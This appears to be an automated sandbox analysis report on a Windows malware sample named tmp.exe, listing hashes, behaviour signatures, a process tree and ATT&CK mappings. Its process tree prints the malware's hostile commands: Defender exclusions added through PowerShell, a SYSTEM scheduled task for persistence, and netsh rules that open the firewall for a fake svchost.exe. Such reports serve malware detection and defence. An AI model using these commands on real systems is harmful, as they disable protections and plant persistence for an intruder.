Resubmissions
12-04-2024 14:13  240412-rjrz5aba72  8
12-04-2024 14:12  240412-rh8aqaba68  7
12-04-2024 14:05  240412-rd9mzsea7x  8
12-04-2024 14:05  240412-rd82fsea7v  8
12-04-2024 14:05  240412-rd8exsea7t  8
09-04-2024 07:05  240409-hws9aacd6z  8
09-04-2024 07:05  240409-hwljfacd6x  8
09-04-2024 07:04  240409-hwbz1acd6t  8
09-04-2024 07:03  240409-hvcvxacd3y  8
15-01-2024 20:15  240115-y1q8gsfdf2  7
Analysis
max time kernel
1800s
max time network
1805s
platform
windows7_x64
resource
win7-20240221-en
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted
09-04-2024 07:05
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
tmp.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
tmp.exe
Resource
win11-20240221-en
General
Target
tmp.exe
Size
9.4MB
MD5
db3edf03a8a2c8e96fe2d2deaaec76ff
SHA1
2d9c9f3a5d06f11c5c881a9df90ba33cc2894ac1
SHA256
a40cac0b6ee1729cdb6fca3c950e533b913c2729afbd2fde045e86cc62c0ff60
SHA512
121b6ba2c7a91a8639b4b88d9965528df245534ec65c4f1d463dbcc3aa2719debb4417a1a7d919527155097cc00521576b25b2d061b149d0c8b82ca999054135
SSDEEP
98304:kT2OhoLUWeKqyubAguIYylB9RK0RU4lFp887VO0J/yLaeWwGvJldmxe:VOE/IYypvU4loRpK
Malware Config
Signatures
Contacts a large (1181) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
Modifies Windows Firewall 2 TTPs 22 IoCs
Executes dropped EXE 12 IoCs
Processes:
pid process
1976 svchost.exe
868 ~tlFA34.tmp
3064 svchost.exe
2544 ~tlDA1A.tmp
2104 svchost.exe
876 ~tl2849.tmp
292 svchost.exe
980 ~tl7D1C.tmp
1560 svchost.exe
2040 ~tlDEEA.tmp
2188 svchost.exe
2516 ~tl4396.tmp
Loads dropped DLL 20 IoCs
Drops file in System32 directory 39 IoCs
Drops file in Windows directory 11 IoCs
Processes:
description ioc process
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\System\xxx1.bak tmp.exe
File opened for modification C:\Windows\System\svchost.exe tmp.exe
File opened for modification C:\Windows\System\svchost.exe ~tlFA34.tmp
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\System\svchost.exe tmp.exe
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\System\xxx1.bak ~tlFA34.tmp
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
1080 schtasks.exe
2988 schtasks.exe
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 39 IoCs
Suspicious use of AdjustPrivilegeToken 26 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\tmp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 2] C:\Windows\system32\schtasks.exe
Command line: schtasks /delete /TN "Timer"
-
[depth 2] C:\Windows\system32\schtasks.exe
Command line: schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
- Creates scheduled task(s)
-
[depth 2] C:\Windows\System\svchost.exe
Command line: "C:\Windows\System\svchost.exe" formal
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\~tlFA34.tmp
Command line: C:\Users\Admin\AppData\Local\Temp\~tlFA34.tmp
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[depth 4] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\system32\schtasks.exe
Command line: schtasks /delete /TN "Timer"
-
[depth 4] C:\Windows\system32\schtasks.exe
Command line: schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
- Creates scheduled task(s)
-
[depth 4] C:\Windows\System\svchost.exe
Command line: "C:\Windows\System\svchost.exe" formal
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
-
[depth 5] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 5] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\Users\Admin\AppData\Local\Temp\~tlDA1A.tmp
Command line: C:\Users\Admin\AppData\Local\Temp\~tlDA1A.tmp
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
[depth 6] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
-
[depth 6] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 6] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 1] C:\Windows\system32\taskeng.exe
Command line: taskeng.exe {0E25D836-BCC5-4836-91D8-B094B15E3EEE} S-1-5-18:NT AUTHORITY\System:Service:
- Loads dropped DLL
-
[depth 2] \??\c:\windows\system\svchost.exe
Command line: c:\windows\system\svchost.exe
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 3] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
- Modifies data under HKEY_USERS
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\TEMP\~tl2849.tmp
Command line: C:\Windows\TEMP\~tl2849.tmp
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 4] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 1] C:\Windows\system32\taskeng.exe
Command line: taskeng.exe {070CB1C9-FCDA-4A23-874E-6340EAF4C01B} S-1-5-18:NT AUTHORITY\System:Service:
- Loads dropped DLL
-
[depth 2] \??\c:\windows\system\svchost.exe
Command line: c:\windows\system\svchost.exe
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 3] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
- Modifies data under HKEY_USERS
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\TEMP\~tl7D1C.tmp
Command line: C:\Windows\TEMP\~tl7D1C.tmp
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 4] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
- Modifies data under HKEY_USERS
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 1] C:\Windows\system32\taskeng.exe
Command line: taskeng.exe {F200F5C0-D00F-4BC8-AF25-048F879BF06E} S-1-5-18:NT AUTHORITY\System:Service:
- Loads dropped DLL
-
[depth 2] \??\c:\windows\system\svchost.exe
Command line: c:\windows\system\svchost.exe
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 3] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\TEMP\~tlDEEA.tmp
Command line: C:\Windows\TEMP\~tlDEEA.tmp
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 4] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 1] C:\Windows\system32\taskeng.exe
Command line: taskeng.exe {0FC8BD48-801F-4A83-98EF-B9A6301E6FFD} S-1-5-18:NT AUTHORITY\System:Service:
- Loads dropped DLL
-
[depth 2] \??\c:\windows\system\svchost.exe
Command line: c:\windows\system\svchost.exe
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 3] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
- Modifies data under HKEY_USERS
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 3] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\TEMP\~tl4396.tmp
Command line: C:\Windows\TEMP\~tl4396.tmp
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[depth 4] C:\Windows\system32\netsh.exe
Command line: netsh int ipv4 set dynamicport tcp start=1025 num=64511
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
[depth 4] C:\Windows\System32\netsh.exe
Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
- Modifies Windows Firewall
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Create or Modify System Process: Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Create or Modify System Process: Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses: Disable or Modify System Firewall (1)
- Subvert Trust Controls: Install Root Certificate (1)
- Modify Registry (1)
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (Filesize 68KB)
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (Filesize 344B)
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (Filesize 344B)
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (Filesize 344B)
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (Filesize 344B)
-
C:\Users\Admin\AppData\Local\Temp\TarF686.tmp (Filesize 177KB)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (Filesize 7KB)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H6TDJCB6L3POM9E6U20Y.temp (Filesize 7KB)
-
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\output1[1].jpg (Filesize 393KB)
-
\??\PIPE\srvsvc
-
\Users\Admin\AppData\Local\Temp\~tlDA1A.tmp (Filesize 393KB)
-
\Users\Admin\AppData\Local\Temp\~tlFA34.tmp (Filesize 385KB)
-
\Windows\system\svchost.exe (Filesize 9.4MB)